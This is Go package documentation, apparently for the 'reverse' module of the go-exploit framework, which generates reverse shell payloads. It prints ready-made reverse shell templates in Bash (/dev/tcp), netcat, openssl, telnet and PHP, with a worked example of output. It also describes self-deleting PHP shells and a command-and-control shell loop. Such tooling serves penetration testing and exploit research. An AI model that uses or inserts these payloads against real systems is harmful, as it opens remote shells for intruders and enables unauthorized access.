Documentation
¶
Overview ¶
Reverse shell and command payloads.
The reverse package contains all the code for reverse shell payloads. Each of these payload types can be used either in the raw string format for manipulation or via the specific payload type provided by the project.
This package is designed to be abstract enough to allow for multiple types of composition, but always with the fact that payloads are almost always string or byte oriented. With this in mind the payloads may be invoked with a constructed type or a direct string call.
For example, here are the 3 ways to create a netcat reverse shell payload that result in the same payload:
reverse.Netcat.Default("127.0.0.1", 1337)
reverse.Netcat.Mknod("127.0.0.1", 1337)
fmt.Sprintf(reverse.NetcatMknod, "127.0.0.1", 1337)
Each of the defined payload types should utilize a Default reverse shell constant that corresponds to the most common case.
Index ¶
- Constants
- Variables
- type BashPayload
- type Default
- type GJScriptPayload
- type GroovyPayload
- type JJSScriptPayload
- type JavaPayload
- type NetcatPayload
- type OpenSSLPayload
- type PHPPayload
- func (php *PHPPayload) Default(lhost string, lport int) string
- func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string
- func (php *PHPPayload) Unflattened(lhost string, lport int, encrypted bool) string
- func (php *PHPPayload) UnflattenedSelfDelete(lhost string, lport int, encrypted bool) string
- type PythonPayload
- type Reverse
- type TelnetPayload
- type VBSHTTPPayload
Examples ¶
Constants ¶
const ( BashDefault = BashTCPRedirection BashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'` BashHTTPShellLoop = `` /* 141-byte string literal not displayed */ )
const ( NetcatDefault = NetcatGaping NetcatGaping = `nc %s %d -e /bin/sh` NetcatMknod = `cd /tmp/; mknod %s p;cat %s|/bin/sh -i 2>&1|nc %s %d >%s; rm %s;` )
const ( OpenSSLDefault = OpenSSLMknod OpenSSLMknod = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;` OpenSSLMkfifo = `cd /tmp; mkfifo %s; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;` )
const ( TelnetDefault = TelnetMknod TelnetMknod = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | telnet %s:%d > %s; rm %s;` TelnetMknodNoColon = `cd /tmp; mknod %s p; sh -i < %s 2>&1 | telnet %s %d > %s; rm %s;` TelnetMkfifo = `cd /tmp; mkfifo %s; telnet %s:%d 0<%s | sh 1>%s; rm %s;` TelnetMkfifoNoColon = `cd /tmp; mkfifo %s; telnet %s %d 0<%s | sh 1>%s; rm %s;` )
Variables ¶
var ( //go:embed groovy/classic.groovy GroovyClassic string GroovyDefault = GroovyClassic )
var ( //go:embed java/process_builder.java JavaProcessBuilderInteractive string JavaDefault = JavaProcessBuilderInteractive )
var ( //go:embed jjs/reverse_shell.jjs JJSShell string //go:embed jjs/reverse_shell_ssl.jjs JJSShellSSL string )
var ( PHPDefault = PHPLinuxInteractive PHPLinuxInteractive = `<?php $sock=fsockopen("%s",%d);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>` //go:embed php/unflattened.php PHPUnflattened string //go:embed php/unflattened_self_delete.php PHPUnflattenedSelfDelete string )
var ( PythonDefault = Python27 //go:embed python/reverse27.py Python27 string //go:embed python/reverse27_secure.py Python27Secure string //go:embed python/reverse3_12_secure.py Python3_12Secure string )
var ( // Example: makes the Bash payloads accessible via `reverse.Bash`. Bash = &BashPayload{} GJScript = &GJScriptPayload{} JJS = &JJSScriptPayload{} Java = &JavaPayload{} Netcat = &NetcatPayload{} OpenSSL = &OpenSSLPayload{} PHP = &PHPPayload{} Python = &PythonPayload{} Telnet = &TelnetPayload{} Groovy = &GroovyPayload{} VBSHTTP = &VBSHTTPPayload{} )
var GJScriptDefault = GJScriptGLibSpawn
var GJScriptGLibSpawn string
var VBSShell string
Functions ¶
This section is empty.
Types ¶
type BashPayload ¶
type BashPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*BashPayload) Default ¶
func (bash *BashPayload) Default(lhost string, lport int) string
The default payload type for reverse bash utilizes the pseudo-dev networking redirects in default bash.
Example ¶
package main
import (
"fmt"
"github.com/vulncheck-oss/go-exploit/payload/reverse"
)
func main() {
fmt.Println(reverse.Bash.Default("127.0.0.1", 1337))
}
Output: bash -c 'bash &> /dev/tcp/127.0.0.1/1337 <&1'
func (*BashPayload) HTTPShellLoop ¶ added in v1.46.0
An infinite loop shell script that will stay running until the HTTP server fails to respond. This fits the c2.HTTPShellServer C2 logic in a shell script form.
func (*BashPayload) TCPRedirection ¶
func (bash *BashPayload) TCPRedirection(lhost string, lport int) string
Utilizes the bash networking pseudo `/dev/tcp/` functionality to create a reverse bash shell.
type GJScriptPayload ¶
type GJScriptPayload struct{}
Defines the default Bash struct and all associated payload functions.
type GroovyPayload ¶ added in v1.16.0
type GroovyPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*GroovyPayload) Default ¶ added in v1.16.0
func (groovy *GroovyPayload) Default(lhost string, lport int) string
func (*GroovyPayload) GroovyClassic ¶ added in v1.16.0
func (groovy *GroovyPayload) GroovyClassic(lhost string, lport int) string
A short payload that creates a reverse shell using /bin/sh -i.
type JJSScriptPayload ¶
type JJSScriptPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*JJSScriptPayload) Default ¶
func (jjs *JJSScriptPayload) Default(lhost string, lport int, ssl bool) string
Generates a script that can be used to create a reverse shell via jjs (Java javascript). This is an adapted version of Frohoff's OG gist. Additionally, the disabling of TLS validation logic was adapted from a blog written by Callan Howell-Pavia.
The script will autodetect if the platform is Windows and provide a 'cmd.exe' shell. Otherwise bash is used.
https://redthunder.blog/2018/04/09/disabling-hostname-validation-in-nashorn-javascript/ https://gist.github.com/frohoff/8e7c2bf3737032a25051
type JavaPayload ¶
type JavaPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*JavaPayload) Default ¶
func (java *JavaPayload) Default(lhost string, lport int) string
Defaults to the UnflattenedJava payload.
func (*JavaPayload) UnflattenedJava ¶
func (java *JavaPayload) UnflattenedJava(lhost string, lport int) string
An unflattened Java reverse shell. This is the "classic" Java reverse shell that spins out the shell using ProcessBuilder and then redirects input/output to/from the sockets.
type NetcatPayload ¶
type NetcatPayload struct{}
Defines the default Bash struct and all associated payload functions.
type OpenSSLPayload ¶
type OpenSSLPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*OpenSSLPayload) Default ¶
func (openssl *OpenSSLPayload) Default(lhost string, lport int) string
type PHPPayload ¶
type PHPPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*PHPPayload) LinuxInteractive ¶
func (php *PHPPayload) LinuxInteractive(lhost string, lport int) string
A short payload that creates a reverse shell using /bin/sh -i.
func (*PHPPayload) Unflattened ¶
func (php *PHPPayload) Unflattened(lhost string, lport int, encrypted bool) string
Creates an encrypted reverse shell using PHP. The payload autodetects the operating system and will selected cmd.exe or /bin/sh accordingly.. The user also specifies if the reverse shell should be encrypted or not.
reverse.PHP.Unflattened("10.9.49.80", 1270, true).
func (*PHPPayload) UnflattenedSelfDelete ¶ added in v1.33.0
func (php *PHPPayload) UnflattenedSelfDelete(lhost string, lport int, encrypted bool) string
Creates an encrypted reverse shell using PHP, same as Unflattened, but attempts to self-delete and sets up destructors to delete file on disk when command exits.
type PythonPayload ¶
type PythonPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*PythonPayload) Python27 ¶
func (py *PythonPayload) Python27(lhost string, lport int) string
An unflattened reverse shell that works on Python 2.7, 3+, Windows and Linux.
func (*PythonPayload) SecurePython27 ¶
func (py *PythonPayload) SecurePython27(lhost string, lport int) string
An unflattened reverse shell that uses an SSL socket, works on Python 2.7, 3+, Windows and Linux.
func (*PythonPayload) SecurePython312 ¶ added in v1.38.0
func (py *PythonPayload) SecurePython312(lhost string, lport int) string
An unflattened reverse shell that uses an SSL socket for Python 3.12 context, Windows and Linux. This payload is required when doing 3.12 SSL reverse shells as Python moved to requiring SSL context over simple socket wraps.
type Reverse ¶
type Reverse interface {
Default
}
Defines the Default function to be created for each type of payload.
type TelnetPayload ¶
type TelnetPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*TelnetPayload) Default ¶
func (telnet *TelnetPayload) Default(lhost string, lport int, colon bool) string
type VBSHTTPPayload ¶ added in v1.42.0
type VBSHTTPPayload struct{}
Defines the default Bash struct and all associated payload functions.
func (*VBSHTTPPayload) Default ¶ added in v1.42.0
Generates a script that can be used to create a reverse shell via vbs (can be run with cscript) original source: https://raw.githubusercontent.com/cym13/vbs-reverse-shell/refs/heads/master/reverse_shell.vbs
Source Files